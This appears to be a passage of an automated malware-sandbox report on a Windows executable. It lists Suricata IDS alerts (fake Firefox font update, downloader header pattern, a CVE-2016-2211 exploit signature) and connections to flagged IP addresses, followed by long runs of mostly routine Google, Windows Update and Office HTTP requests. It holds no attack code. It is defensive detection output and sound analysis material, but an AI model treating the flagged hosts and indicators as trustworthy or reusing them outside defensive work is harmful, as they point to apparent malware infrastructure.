Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49906 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49916 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49912 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49931 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49944 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49986 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49963 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49992 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50002 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50003 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50009 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50022 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50035 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50042 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50051 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49979 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50062 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50080 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49756
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49763

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C64CC60 PR_Recv,

0_2_6C64CC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=u54vEykpv7wHeKh&MD=YpZXwanl HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=u54vEykpv7wHeKh&MD=YpZXwanl HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
